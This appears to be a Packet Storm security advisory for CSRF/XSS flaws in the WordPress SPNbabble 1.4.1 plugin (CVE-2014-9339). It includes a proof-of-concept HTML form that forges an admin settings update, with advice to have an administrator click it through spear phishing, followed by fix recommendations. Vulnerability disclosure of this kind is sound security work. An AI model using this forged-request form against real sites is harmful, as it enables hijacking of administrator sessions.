what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress SPNbabble 1.4.1 CSRF / XSS

WordPress SPNbabble 1.4.1 CSRF / XSS
Posted Dec 14, 2014
Authored by Manideep K

WordPress SPNbabble plugin version 1.4.1 suffers from cross site request forgery and cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss, csrf
advisories | CVE-2014-9339
SHA-256 | 40e5d13856c461690cf62603b22a1499bcea09416e08cde4376649a16343fbdb

WordPress SPNbabble 1.4.1 CSRF / XSS

Change Mirror Download
# Title: CSRF/XSS Vulnerability in SPNbabble WP Plugin 
# Author: Manideep K
# CVE-ID:  CVE-2014-9339
# Plugin Homepage: https://wordpress.org/plugins/spnbabble/
# Version Affected: 1.4.1 (probably lower versions)
# Severity: High

# About Plugin:
SPNbabble (http://spnbabble.sitepronews.com) allows users to create an account and post 140 character blogs with urls to send out messages to your followers. Through the professional setup of SPNbabble you can also auto connect to Twitter, Friendfeed, Plurk, Tumblr, Facebook, Zannel, Youare, Meemi & Utterli. This plugin once installed allows you to enter your SPNbabble user and password and you can choose which blog posts will be converted into mini blogs. Your blog turned into several mini blogs on the most popular social media platforms is a great way to keep your message strong.

# Description:
# Vulnerable Parameter: username, password etc
# About Vulnerability: This plugin is vulnerable to a combination of CSRF/XSS attack meaning that if an admin user can be tricked to visit a crafted URL created by attacker (via spear phishing/social engineering), the attacker can insert arbitrary script into admin page. Once exploited, admin’s browser can be made to do almost anything the admin user could typically do by hijacking admin's cookies etc.
# Vulnerability Class:
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29
Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS))

# Steps to Reproduce: (POC):
After installing the plugin
You can use the following exploit code to exploit the vulnerability. For testing - you can just save it as .html and then get it clicked with an logged in administrator (by social engineering/spear phishing techniques) and see exploit in action
Almost majority of the fields are vulnerable to CSRF + XSS attack
<html>
<body>
<form action="http://localhost/wordpress/wp-admin/options-general.php?page=spnbabble.php" method="POST">
<input type="hidden" name="username" value="csrf testing" />
<input type="hidden" name="password" value="" />
<input type="hidden" name="blogname" value="" />
<input type="hidden" name="postprefix" value="New Blog Post:" />
<input type="hidden" name="spn_enable" value="Yes" />
<input type="hidden" name="spn_update" value="Yes" />
<input type="hidden" name="info_update" value="Update Options" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

# Recommendations:
a) Use proper input filtering techniques
b) Use unique tokens such as nonces

# Mitigation:
Plugin Closed

# Credits:
Manideep K
Information Security Researcher
https://in.linkedin.com/in/manideepk

Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    0 Files
  • 7
    Aug 7th
    0 Files
  • 8
    Aug 8th
    0 Files
  • 9
    Aug 9th
    0 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close